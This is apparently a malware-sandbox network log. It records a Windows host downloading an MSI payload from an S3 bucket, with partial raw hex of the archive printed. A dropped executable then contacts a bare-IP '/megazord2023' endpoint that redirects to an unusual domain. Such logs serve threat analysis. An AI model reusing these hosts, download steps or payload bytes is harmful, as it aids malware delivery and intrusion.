Jan 3, 2023 16:29:50.676558018 CET	2164	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 173 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 3, 2023 16:29:50.828094006 CET	2165	IN	HTTP/1.1 200 OK Date: Tue, 03 Jan 2023 15:29:50 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 3, 2023 16:29:50.830823898 CET	2165	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 180 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 3, 2023 16:29:50.978033066 CET	2166	IN	HTTP/1.1 200 OK Date: Tue, 03 Jan 2023 15:29:50 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 3, 2023 16:29:50.980161905 CET	2166	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 220 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 3, 2023 16:29:51.130179882 CET	2167	IN	HTTP/1.1 200 OK Date: Tue, 03 Jan 2023 15:29:51 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive
Jan 3, 2023 16:29:51.133243084 CET	2167	OUT	POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64) Host: collect.installeranalytics.com Content-Length: 177 Cache-Control: no-cache Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
Jan 3, 2023 16:29:51.290532112 CET	2168	IN	HTTP/1.1 200 OK Date: Tue, 03 Jan 2023 15:29:51 GMT X-Powered-By: Express Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49714	20.203.138.85	80	C:\Users\user\fQQPwD.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 16:29:55.468615055 CET	2168	OUT	GET /megazord2023/index.php HTTP/1.1 User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36" Host: 20.203.138.85 Connection: Keep-Alive
Jan 3, 2023 16:29:55.535834074 CET	2169	IN	HTTP/1.1 302 Found Date: Tue, 03 Jan 2023 15:29:55 GMT Server: Apache/2.4.29 (Ubuntu) Location: https://amxx1515cabreun23.asxo/ Content-Length: 92 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 73 74 72 6f 6e 67 3e 42 72 6f 77 73 65 72 3a 20 3c 2f 73 74 72 6f 6e 67 3e 43 68 72 6f 6d 65 3c 62 72 20 2f 3e 3c 73 74 72 6f 6e 67 3e 4f 70 65 72 61 74 69 6e 67 20 53 79 73 74 65 6d 3a 20 3c 2f 73 74 72 6f 6e 67 3e 55 6e 6b 6e 6f 77 6e 20 4f 53 20 50 6c 61 74 66 6f 72 6d Data Ascii: <strong>Browser: </strong>Chrome<br /><strong>Operating System: </strong>Unknown OS Platform

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49710	3.5.17.120	443	C:\Windows\SysWOW64\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-03 15:29:19 UTC	0	OUT	GET /digivolve.msi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: mzrdmodlonnce.s3.amazonaws.com
2023-01-03 15:29:19 UTC	0	IN	HTTP/1.1 200 OK x-amz-id-2: 0iyiF+q78dLSokCPZtTv2PCvx4E54JQX0cC2AoD940O8vasXDn5Ev6GRL1yhcvrlZ9tYAUJm3tQsPjxbOvmHKQ== x-amz-request-id: 93ER1GZ42S280547 Date: Tue, 03 Jan 2023 15:29:20 GMT Last-Modified: Tue, 03 Jan 2023 03:07:25 GMT ETag: "adc4a5ca2eed9759869cf26e5000f694" Accept-Ranges: bytes Content-Type: binary/octet-stream Server: AmazonS3 Content-Length: 1907700 Connection: close
2023-01-03 15:29:19 UTC	0	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 71 1f 63 55 dc 16 3c 0e 09 3d 06 00 a8 c5 0c 00 0a 00 00 00 64 69 67 69 6d 6e 2e 62 7a 32 ec 5a 7b 7c 13 55 be 3f 49 d3 92 3e cf 84 57 d1 45 88 38 ae 2d 02 16 dd e5 22 b2 dc 80 2d 0a 16 88 14 8c f2 6c 81 16 58 4a d3 5b 6a 65 5d a0 a5 69 c1 58 e3 d6 15 bd 28 97 5d 7c ad 8a 77 3f a2 22 0b eb 2b 69 95 47 0b 58 84 02 95 d2 07 0f 99 29 42 5a 40 68 79 e5 fe 7e e7 cc 24 69 d2 42 b9 eb de 7f ee ce a7 33 73 e6 3c 7e e7 f7 fc 9e df 39 cd 84 69 4b 89 86 10 a2 23 ed 2f 13 b9 f9 b5 14 ee 98 fe 7f 8f 21 9b c3 f7 dc b9 55 93 bc e7 ce 29 0b 16 2e 31 66 e7 58 e7 e7 a4 2d 36 ce 4d cb ca b2 e6 1a e7 a4 1b 73 9e ce 32 2e cc 32 26 4e 4a 31 2e b6 ce 4b 1f 22 12 62 4e 22 24 59 13 4e 4e 1c 9f 33 57 a5 d7 40 06 68 22 35 31 84 24 46 10 32 59 cb eb 5a Data Ascii: PKqcU<=digimn.bz2Z{\|U?I>WE8-"-lXJ[je]iX(]\|w?"+iGX)BZ@hy~$iB3s<~9iK#/!U).1fX-6Ms2.2&NJ1.K"bN"$YNN3W@h"51$F2YZ
2023-01-03 15:29:19 UTC	16	IN	Data Raw: 0b f0 0a df 86 bc 36 1e c5 84 8e 9d be 09 1d 3b f5 84 0e ec 7e 95 90 a7 eb 3c bb e6 ba c7 e2 f7 86 9f ca 1f e7 39 1d cd 17 9f d3 a1 e7 17 f8 66 ee 04 78 e6 4e d0 7a 4c e6 17 ec 74 e7 17 b8 1f a0 e7 18 6c 0b b7 fc 1f 26 8f 64 97 17 6d 08 81 bd 4f e9 67 3d 16 cb fd 0d 16 cb 6d a9 dd dd c9 8b e5 3a f1 f0 5f 6f 78 da f2 3d de 12 f7 28 fd eb fe 08 96 62 e2 d5 71 ec 9b 51 8d 05 8f d8 54 a3 96 57 97 e2 e5 04 af 75 ac d5 bb 4a 90 bc c8 02 6c f9 3e 78 ac 3e ea a3 f3 87 f1 88 6c 07 b6 62 68 99 51 d8 15 a4 12 7b 84 9e 08 e8 36 83 17 d3 01 51 59 35 85 25 a0 dc 72 b0 28 da 98 46 2b c7 a2 49 d3 ea a0 86 84 55 7a 10 dc 24 d6 44 2f 53 67 d0 7b d0 9c b0 49 f6 cc b4 1a 97 b5 9b ad 9f 5d a9 a8 d9 95 63 95 b5 71 18 12 8c d3 57 18 3d 56 1f 45 82 65 d9 d8 e2 4c 75 e3 cc 15 20 Data Ascii: 6;~<9fxNzLtl&dmOg=m:_ox=(bqQTWuJl>x>lbhQ{6QY5%r(F+IUz$D/Sg{I]cqW=VEeLu
2023-01-03 15:29:19 UTC	17	IN	Data Raw: e3 6c 94 16 63 60 d7 8e 8b 7b 42 60 9d 80 09 66 98 04 a2 24 81 61 08 20 0f 5f a3 14 d2 64 51 24 04 6c 70 a6 a6 8c eb ee b8 bb ee 11 75 1c ce 28 b3 32 ce 2c eb 23 3a 88 79 75 12 24 40 42 9a 24 40 34 e1 21 74 20 92 84 67 3a 81 f4 de ef de aa ee aa ee bc 0d 7b d8 73 e0 1c a0 eb af aa 7b ff 7b bf ef bb 8f ee aa ff ef e8 53 f8 c9 83 14 7e 54 df c2 af 0d 10 fe 79 3f fa 29 41 c2 67 a3 7e a3 5f f8 1d 7e e1 9f d0 82 ef e9 af f0 1b 7a 14 7e 07 03 3f ed ff 44 f8 f5 fd 11 7e fa 0f 10 7e 43 0f c2 ef ec 53 f8 f3 07 29 7c 5b df c2 6f d0 0b ff 82 1f fa 85 c1 c2 4f db 94 93 40 63 67 6f e9 ba e2 f5 aa 8d 8e 60 ea d7 6d a8 d4 05 22 55 3a 6b 2c 04 ae d1 36 9b cf 69 c3 98 9a 95 f6 30 11 fb f4 cb b4 ab 75 5e 91 2b 93 aa 4f a5 8a d3 56 bf d3 7c 4f 9a 54 e5 d8 9d 14 55 15 fa 5d Data Ascii: lc`{B`f$a _dQ$lpu(2,#:yu$@B$@4!t g:{s{{S~Ty?)Ag~_~z~?D~~CS)\|[oO@cgo`m"U:k,6i0u^+OV\|OTU]
2023-01-03 15:29:19 UTC	33	IN	Data Raw: fa ec 52 22 5d 29 d6 92 68 dc 7a 80 47 cc 67 3b 48 f6 32 35 92 21 7b 31 fe d8 f1 27 1d 7f 30 b5 77 36 1e 08 90 8d b8 89 71 35 6a c9 11 01 13 e7 1e 2d 96 16 a9 05 b5 a9 5d be 40 8e 48 1f 0c 43 dd 41 da 8c 7f 9e 56 82 2f 3a 24 fb 33 c1 18 84 f2 9f 69 81 89 3e d0 fa 99 f2 73 94 f4 f9 da 39 54 fe 7d ac 4c 96 e9 c8 bc e7 11 c4 38 cc 0f 77 36 04 ee 7d 15 6e 8a 2c cb 11 d8 09 c7 0c ea 30 45 38 6b ee 13 34 6f b1 c4 60 e2 6b bf 13 15 f4 36 0e 47 4f a3 1d 75 d3 3f e3 98 8a 8b f4 2e 90 eb ae 62 78 c2 76 bb 3c bc e5 24 ff c4 2a b8 e9 3e 31 a5 5b 9c ad 9c e2 0e 1a bd 98 2d 23 be 05 ad 49 d8 48 b1 4a 83 a8 71 a6 c2 b2 cf c1 30 6a 01 2d d3 33 0c 6a 92 4f 16 b9 97 a5 ae ca 2d a8 77 6d c3 f1 71 9f c1 08 6a 9d 98 9a 66 39 c4 3f f1 27 78 de 7d 72 4a ff 52 6d 39 93 c2 30 b8 Data Ascii: R"])hzGg;H25!{1'0w6q5j-]@HCAV/:$3i>s9T}L8w6}n,0E8k4o`k6GOu?.bxv<$*>1[-#IHJq0j-3jO-wmqjf9?'x}rJRm90
2023-01-03 15:29:19 UTC	34	IN	Data Raw: bb fe 23 21 53 8f 86 16 2e 1e 30 42 ba 01 7d 8c 96 1e e7 6c d7 7a 3d 7a fb ea 01 52 d0 55 5b d6 55 1b 9c 23 85 05 4f 19 c8 82 6a 43 fa f4 6c 3d 7a fb b0 7c 43 ba 6b 9d 4b c7 38 75 62 4e 3f 99 a3 cf 71 f5 b0 ab ff ad 0c fb 43 38 e2 eb 02 c3 fe 7e c8 b0 9f 3e ae 0c fb cf d4 75 9a 50 fd ed 1a 8c 86 48 8b 51 14 b8 27 4e fa 15 38 93 90 ab f7 c7 9f 0d 54 cd 4c 6f 85 c5 77 29 c1 7f d2 9b d4 2b 4b 0e 98 eb 6b f7 af b9 69 1b b3 eb a5 e9 f6 fc 82 62 e9 c9 13 1c 83 4a 98 7d 2b 7d 04 4f 0e 5e 0f 4f 1a dd 9f 68 bc df e9 3e b9 9d ba 36 4e a8 f0 60 32 16 21 bc 55 02 eb be bb 0d ac 78 ea b3 1b 7f 20 f0 3d 40 3c 8f df b7 92 a3 ee be c9 ee 8b 13 93 1a c7 ef 12 ac be 58 0c a2 ed 14 b5 22 c2 8b a9 22 93 f8 fd cf f8 2c 0c 9b 20 46 62 d7 92 65 81 48 3f a5 c9 d2 4b c7 50 84 9c Data Ascii: #!S.0B}lz=zRU[U#OjCl=z\|CkK8ubN?qC8~>uPHQ'N8TLow)+KkibJ}+}O^Oh>6N`2!Ux =@<X"", FbeH?KP
2023-01-03 15:29:19 UTC	50	IN	Data Raw: 10 b2 52 8b 36 39 e2 34 51 5a 76 af 82 d3 64 ba 5b 11 86 c4 0d d5 27 b5 56 f7 62 52 ae f5 71 42 5e aa 68 d7 82 1c 27 1c 34 82 2a 11 a6 62 69 c4 22 5c 85 c2 93 19 89 a2 58 24 88 b6 34 d0 2d 12 ed d2 8e 7d 74 75 c3 3f 9c df f9 09 dd 52 1a 0d c2 af 8a d3 a0 8a 51 c1 91 18 4a 21 71 f2 2a 4e fa 7b 8c ba 1c 30 8d 3e 48 94 de 57 1e 08 4f b6 07 d8 96 f4 84 eb 13 89 e2 5f 0d 94 d1 da 54 02 50 8a 7a 22 b2 a8 e5 ca 03 c0 59 c8 da c2 37 ce 8f cb be 61 7e 94 e7 5d 8e 1f f9 75 e1 fc f8 a3 9c 2b f3 e3 97 d3 2f c3 8f af 3d 3f 34 3f a6 e6 5c 96 1f c7 e6 84 f3 e3 b0 9c a1 f9 b1 f8 f1 2b f1 e3 ed 8f 87 f3 e3 96 ec ff 30 3f 5e 18 f7 4d f0 63 bb ed 6b f0 e3 cf 1e 08 f2 23 c9 d7 46 b0 a4 79 4f 18 4b ee fd f1 e5 59 f2 2e 6d 04 1f 25 69 2f cb 92 43 73 a4 2f 2a a2 a4 93 51 83 72 Data Ascii: R694QZvd['VbRqB^h'4bi"\X$4-}tu?RQJ!qN{0>HWO_TPz"Y7a~]u+/=?4?\+0?^Mck#FyOKY.m%i/Cs/*Qr
2023-01-03 15:29:19 UTC	51	IN	Data Raw: 4e 0f f0 23 17 c1 8f df 59 1a 3e fb 7d 7c c7 a0 b3 5f 18 3f ce bb 79 b0 d9 cf 16 45 f9 71 62 08 3f 7e f2 44 28 3f 86 cf 84 8f dd 71 d9 99 f0 db 77 84 cf 84 73 ee 18 7a 26 7c 65 c9 95 66 c2 c7 97 84 cf 84 5f de 3e c4 4c 38 09 18 69 e0 64 08 fc 38 a1 2e 2f fe 2a f9 11 e6 c3 f8 0d 45 13 22 f8 31 15 fe 27 a8 fc 98 48 f9 d1 84 fc 38 11 f8 31 0a f8 b1 f5 ae ff 31 7e 0c 99 1a c7 de 1e 9c 1a 81 1f a3 98 c0 04 59 3e f8 04 a9 ce 8e 7f 9b 47 f9 f1 9f a5 69 e7 f9 4a 5b 1a e5 c7 43 8c 7f 92 2c 57 26 c9 07 de 0d e3 c7 de aa cb 4f 92 0f 9f 8b 98 da 16 9c fb aa fc e8 2f ea da c8 a2 62 cf 0d e4 c7 c1 f8 0b 97 cf 69 75 61 61 01 cc dd 99 91 7b 96 fd 49 ab ef a5 4b 9a b8 8c 68 42 04 15 25 12 3b 87 08 90 fe d1 20 cb 0a f6 e9 29 bc 79 e5 ca a2 fe 1e 0d c6 48 d1 00 a9 a1 46 8b Data Ascii: N#Y>}\|_?yEqb?~D(?qwsz&\|ef_>L8id8./*E"1'H811~Y>GiJ[C,W&O/biuaa{IKhB%; )yHF
2023-01-03 15:29:19 UTC	67	IN	Data Raw: a5 f0 a8 4f e5 f1 fc 92 14 1e 3f 5f 92 ce 23 1c aa d6 25 1f aa cc 0d 87 d3 e8 50 aa ea 73 b8 f4 a7 73 e0 69 cc f8 86 c0 48 9b 3e c1 97 b6 c1 40 1a be 50 8e 3c 0c 27 a6 3b b9 ba 3b 23 ae c8 36 3e 52 a6 dc f1 c7 1c 1a 47 f5 6d 66 62 fb fd 6d 39 14 0e a3 46 b6 c3 cc 21 49 2f 7b 46 d0 bb 4f 50 1e 96 a1 9f 0a 4f ac e4 5c ca 53 ae 1c 2e c1 be f2 1c c7 ce 77 41 e6 2e 0b 47 48 99 5a 09 12 ed 2b 86 0c f6 15 47 51 76 c6 15 81 38 8c d4 b8 a2 4f 35 ae f0 68 5c 19 12 71 64 9f 88 85 4d e5 99 71 e5 c4 6a 1a 90 95 1a 57 fc 5c 92 71 45 88 1a 57 0c 89 c6 15 1e 8d 2b 26 2a b8 4b 46 11 66 29 45 cb ca 6b 54 9e 8b a8 08 e6 95 77 06 35 c1 ca c9 61 bd a4 79 1b 83 fc d2 73 1c 35 66 2c 80 b5 80 fa c9 31 4a 12 61 e1 38 6d 64 f0 ce 39 91 93 b0 fe 42 83 4e e5 c5 97 39 2e cb 5a 65 91 Data Ascii: O?_#%PssiH>@P<';;#6>RGmfbm9F!I/{FOPO\S.wA.GHZ+GQv8O5h\qdMqjW\qEW+&*KFf)EkTw5ays5f,1Ja8md9BN9.Ze
2023-01-03 15:29:19 UTC	68	IN	Data Raw: 6d 27 6f 15 3d 66 d2 55 32 5a 7e 1c cd 56 4f bf a9 f9 c0 d7 cd 5b 87 b7 7f 24 1e c8 25 5d e3 47 da c7 da 76 1a a4 c9 b7 59 bb b6 e7 49 d5 85 cc 6f 3a 96 ec 3a 25 7f a2 8a 8f b4 30 bb 2a 7e fb e9 05 54 0c cb 30 fb 73 91 2d cd 8d ef 35 8a ad 3d 83 71 ae 9d d4 02 5b ab bc b3 85 59 60 1b f5 2a 06 42 a3 9d 17 22 fe 21 90 46 53 f7 32 ba 62 4b 35 46 a7 52 2a e0 7a 1d 4c 00 43 a8 0f e0 cc e5 78 77 a4 a3 a1 90 e5 2d 78 1d df a1 e9 91 1d 93 70 d5 76 15 ca 5e bd 78 e0 23 e7 da ba c8 02 ba 68 57 1b 61 0f 03 cd 33 c4 0b 17 ed 1b 75 0c 11 99 81 cb f6 8d 09 80 48 34 ac b6 96 06 a6 26 0f 05 93 00 91 60 32 20 72 3f 02 22 f7 24 01 22 b8 96 5d 0c 18 e9 de f3 5c 1a 26 f2 e3 3f c1 a3 5d 37 f6 2b 14 17 79 d6 97 09 17 09 46 71 91 2d 4f 21 b1 36 c4 45 26 c5 71 91 dc 1d 56 d9 3e Data Ascii: m'o=fU2Z~VO[$%]GvYIo::%0~T0s-5=q[Y`B"!FS2bK5FR*zLCxw-xpv^x#hWa3uH4&`2 r?"$"]\&?]7+yFq-O!6E&qV>
2023-01-03 15:29:19 UTC	84	IN	Data Raw: ba f0 49 1a 3c ce 67 d0 69 03 c2 0f 28 bf 8d 53 07 3a 0f bd ef bb 3e e7 a1 c7 7d a6 59 07 1e 61 e2 bf 66 08 7d 42 aa 30 ad a3 9d 8b ce fb fb 55 7e 2e fa 5a df 6f f9 4f be ff ce 0e ff f7 d3 af fb fd bf 1f f1 7f bf 80 05 62 11 e0 7f 09 18 b1 e7 80 16 51 05 0f b0 17 2a 2d be 13 b9 78 3c bb 42 ef 3f 24 98 54 61 90 aa f1 16 6a fa eb df 84 09 ec d0 2f 7d 1d 9e f0 86 53 d4 4b ed 9e 70 24 c4 59 d8 92 4b c3 78 ed 94 fb 15 bb 29 bf 80 56 d6 b1 d3 8e a4 9e 7c 29 3f a6 07 dd 67 24 c7 a8 ae b6 47 c9 a5 3f 7f 9f b5 13 9d c1 ca 84 ce 79 b7 9c 6d 30 67 b7 db 1f 74 74 de 66 cf 91 2d 46 0f 9b 2e 47 dd b9 3a d1 75 e9 e4 e8 ce 95 77 7a ad 1e 1d 66 7a 6f a2 c3 10 2f bb 99 e0 3e 6a b3 a5 dd 36 d6 87 91 78 82 ef bf 5e f7 01 1e 3d 75 7c 11 cd cc b0 44 57 d6 76 2c ca 7c 16 0a 32 Data Ascii: I<gi(S:>}Yaf}B0U~.ZoObQ*-x<B?$Taj/}SKp$YKx)V\|)?g$G?ym0gttf-F.G:uwzfzo/>j6x^=u\|DWv,\|2
2023-01-03 15:29:19 UTC	85	IN	Data Raw: 0a d2 eb 75 de 70 6e f7 e2 38 24 06 9e f0 d8 e6 02 93 b2 ed e2 67 9a 15 b7 ed 02 a6 cf f8 d3 b1 47 20 7d d4 9f 9e 85 e9 7a 7f ba 1c d3 5b fc e9 4d 98 7e cf 9f 6e c4 f4 cf fc e9 2b 98 7e d9 9f 5e fc 77 48 2f f7 a7 8f 60 ba c8 9f d6 1f 85 74 be 3f 3d 11 d3 19 fe f4 22 4c 4f f2 a7 d7 61 fa 0e 7f 7a 1b a6 47 fa d3 ad 98 0e f7 a7 8d 5f 22 fd 3b fc f4 60 fa 8c 3f bd 09 d3 47 fd e9 46 4c d7 fb d3 57 30 bd c5 9f 1e df 84 f4 fb d3 b5 98 fe 99 3f fd 11 a6 5f f6 a7 5b 30 bd dc 9f 36 1c 43 fa fd e9 c9 98 ce f7 a7 8f 60 3a c3 9f 16 8e 23 fd fe f4 04 4c df e1 4f cf c7 f4 48 7f ba 1a d3 e1 fe 74 3b a6 2f 7e ea 4b 47 9f 40 fa fd e9 79 98 3e ea 4f af c7 74 bd 3f bd 0f d3 5b fc e9 d6 66 a4 df 9f 16 4f 22 fd fe f4 4a 4c bf ec 4f b7 63 7a b9 3f bd f8 14 d2 ef 4f 1f c1 74 be Data Ascii: upn8$gG }z[M~n+~^wH/`t?="LOazG_";`?GFLW0?_[06C`:#LOHt;/~KG@y>Ot?[fO"JLOcz?Ot
2023-01-03 15:29:19 UTC	101	IN	Data Raw: e1 ba e4 e8 bc bd 6c 85 12 57 d3 0a 3a d5 51 17 62 3e 69 3f 43 f6 32 87 7b 34 e7 c5 ca f7 9c 62 2e 98 3f f0 17 a9 3e 35 c3 b6 01 27 48 91 de 07 ef b1 45 39 ea 91 de b6 55 d8 f3 ba c1 c4 ac b6 e1 44 93 63 e5 83 40 f5 5d a4 b0 99 d4 c5 77 ea 2e 01 57 e2 3b c8 2e a0 bb 33 14 3a 57 61 f3 ea 6d 6d 33 01 10 87 bf f5 6d a9 f0 94 94 77 44 aa 46 af 2f fe 32 0c 90 e6 f3 52 35 ae 10 7f a8 93 f1 72 d5 16 3c e1 0b 4f b8 c3 08 27 ea 17 b1 48 03 e6 4e bb 1e 6c fc 0e e0 d9 48 e7 d2 80 73 d6 cf df a6 cd a3 66 b7 92 0a 9a 43 17 f0 8c b6 f1 6a 6c c0 1b 5c 4f bb eb bf 58 4f bb d2 6b 3d ed 2f b7 fa d7 d3 f2 f4 38 39 99 5c eb 8c 79 8c ed 5b 34 ca 33 f4 64 8e 6f cf af 77 98 ba 67 06 44 93 4e f9 15 06 19 ef 70 8a 1b 9d 73 0c f2 2d 72 be 68 3e 2e 55 3b b0 c9 2d 1d 6c 7e 7a fa 15 Data Ascii: lW:Qb>i?C2{4b.?>5'HE9UDc@]w.W;.3:Wamm3mwDF/2R5r<O'HNlHsfCjl\OXOk=/89\y[43dowgDNps-rh>.U;-l~z
2023-01-03 15:29:19 UTC	102	IN	Data Raw: 42 4f 76 be 8e fd f6 d7 b8 eb d7 f9 2a de db 4d bf f9 a9 ba ec 30 c4 bf 0e d2 eb 3c 1e c6 9b 21 86 b8 00 3b 09 bc 27 50 5a 83 f3 29 79 21 cc af 9e 4a 94 92 90 e2 5f 41 b3 81 29 56 59 a3 05 30 b1 45 83 97 f4 f2 10 70 4f 75 f5 19 e0 d6 e8 53 e2 eb c0 b3 11 bd 7a fc 8b 19 b2 18 e7 9c af c7 c8 2a 8f 39 57 c6 19 4b 74 05 b9 f4 f3 e7 d9 6e 41 f9 81 d7 91 9f 17 6d b7 e7 d3 9b f9 b7 ac f9 b9 f4 6d fe 16 51 1e 02 70 2b 5d cf 33 2a a7 ac c7 f6 b7 8d 2f a0 d3 7e cf 56 3c a0 a8 11 ec 09 cb 8f 7b c8 39 2b 2e ae 44 97 63 a5 8f 6b 08 af 21 82 3c 31 ce 76 0b 9d f0 7b f4 a4 ad d4 34 eb aa e2 2f fa 01 0d b2 f5 26 54 3a d5 49 ba c0 30 35 05 ca 88 56 8c ba 11 2a a7 88 ce 89 a1 8e 95 a1 b3 14 fb 43 40 46 1c f6 c3 0b de ab 30 aa 17 57 3e 39 4b a0 17 61 f4 27 1e 59 90 b3 62 c8 Data Ascii: BOvM0<!;'PZ)y!J_A)VY0EpOuSz9WKtnAmmQp+]3/~V<{9+.Dck!<1v{4/&T:I05VC@F0W>9Ka'Yb
2023-01-03 15:29:20 UTC	114	IN	Data Raw: 45 ec 3d 2f 7d 99 97 6e bf 11 5b c5 ae 53 bb ff 7b 3d ff 1e 5d 2a e9 26 98 b9 17 b1 df bc 8c 47 fb 2a 85 11 1b 98 2f 9a 83 c4 a4 3b 52 7e ba 96 c5 1f a4 b3 d8 bd e4 bf 47 eb b1 60 b2 15 fa 4b bd c0 14 42 23 37 af f0 58 30 a9 ad 5a fc 0a 53 68 f6 a1 42 73 c5 1d 01 fa 0a 93 79 33 71 6b d8 68 b9 c0 ce 67 81 9e 5b 2e 38 6a 2f c3 e7 1b 0c a9 5d aa c9 b9 16 3e 60 53 0e ec 13 85 69 9e 5d a5 7a 2f 3f d8 d4 c1 ca 60 f3 e4 fd 82 49 21 de b6 3d a8 5d f4 b6 32 e0 7b 0f b3 e5 e1 dd 1f b6 fe fc 8b 64 34 40 ce 8a 90 a3 3e 06 b9 a2 fa 1d d2 b0 f3 fb 58 7a c5 5c 81 ad 8b 19 af 89 da a2 b0 df 70 85 05 f1 d8 42 ff 62 78 06 c0 84 81 e6 8b b1 76 7a 6e 8f 36 05 78 a7 da 5f f5 77 e2 fb bc 13 2f 62 23 bc e4 bc 0f b8 cc b2 95 cf cb 3b 7b 42 e7 ce be 83 ba 7b c3 e6 4d d6 8a 57 e3 Data Ascii: E=/}n[S{=]&G/;R~G`KB#7X0ZShBsy3qkhg[.8j/]>`Si]z/?`I!=]2{d4@>Xz\pBbxvzn6x_w/b#;{B{MW
2023-01-03 15:29:20 UTC	130	IN	Data Raw: f2 b6 69 2c 56 9b 5e 35 39 ab 56 c3 aa 2d 91 e8 83 77 33 58 79 ad ae b2 b3 85 f4 04 87 89 f7 ba 82 12 d1 1b 59 50 12 41 17 de 1d 80 e5 69 84 65 d9 59 d2 59 48 bf cf 28 2e ac e7 b1 ac 7b a6 b1 6c 62 0f b2 b9 f9 e2 47 1a 5c f9 31 c3 a2 e5 38 48 76 d6 ef b1 9c 45 a2 19 ce 01 b1 c6 1e fa c6 18 a4 f7 23 e8 c7 77 69 cd d9 1e 71 15 b5 60 c6 86 e2 fb 57 e3 22 7d 78 12 b6 94 47 cd 63 d9 22 7d c3 a8 aa ec ed 8f d8 db 3c ed ed 44 fe f6 69 ff db 8d ec ed 4c ed ed 65 23 7b bb de 88 d3 ff da 0f 59 37 a1 25 03 8e a4 d2 88 43 60 52 c0 08 98 ac dc b3 74 a9 d1 6f 13 53 bd 0c 87 e0 f8 30 21 8c d9 0f 6f 7f b9 a3 fb aa 5c 21 2e aa 0f f5 97 ab 94 91 49 73 17 fb 73 a7 c1 22 e6 07 e2 7e 1b 48 32 72 c6 98 5c e1 a5 14 f8 e3 b7 95 f4 db 4e a2 08 80 ba 5c a1 64 04 2c b0 04 fc 47 f7 Data Ascii: i,V^59V-w3XyYPAieYYH(.{lbG\18HvE#wiq`W"}xGc"}<DiLe#{Y7%C`RtoS0!o\!.Iss"~H2r\N\d,G
2023-01-03 15:29:20 UTC	131	IN	Data Raw: c3 39 dc a0 18 a7 57 6b 7f e0 37 79 1c 4f 6f 9a 99 08 cd 4e 9c 6b 62 83 fa 91 07 fe 1d 5c 23 7f af 71 8d 7c 0c 00 73 ea 21 53 12 4c 50 22 cf 95 0a 77 b3 e0 2e 05 80 ce 70 f8 eb bd f0 7c 6c 0b 9b 92 5b 9a 36 e4 70 ca 6a e0 94 55 9a 38 d2 c8 eb 84 29 fd 51 13 d4 09 93 f6 bd b1 da 44 8e d5 26 72 1f 4c e4 3e 98 48 f8 b7 ba 11 26 90 01 17 7e 81 b4 c1 44 c6 9f e0 e6 66 69 e8 ff 74 67 a4 70 e2 21 93 de bf 16 8b 11 9e f4 a1 34 cd 0a 1a ef 54 d9 b9 13 a4 16 39 f5 25 ec 03 19 8b ed f3 62 ef f1 62 ed cf a1 91 34 c2 99 4e f7 7f 98 c4 3f fc 6d bf aa 0e 02 2b fc fa 31 1b 2e 99 95 db 48 04 d4 4b 08 33 5e cf 77 b5 9a ef ed 1f 9c ff 39 64 e9 58 ba 77 48 c3 4e ef 63 13 e4 9a 6b 04 7c cd ac a8 6d 0b b9 4c 90 83 a3 c4 af e8 d6 f9 5a 67 f1 4e b5 37 bb 72 df a2 13 a7 61 b6 a8 Data Ascii: 9Wk7yOoNkb\#q\|s!SLP"w.p\|l[6pjU8)QD&rL>H&~Dfitgp!4T9%bb4N?m+1.HK3^w9dXwHNck\|mLZgN7ra
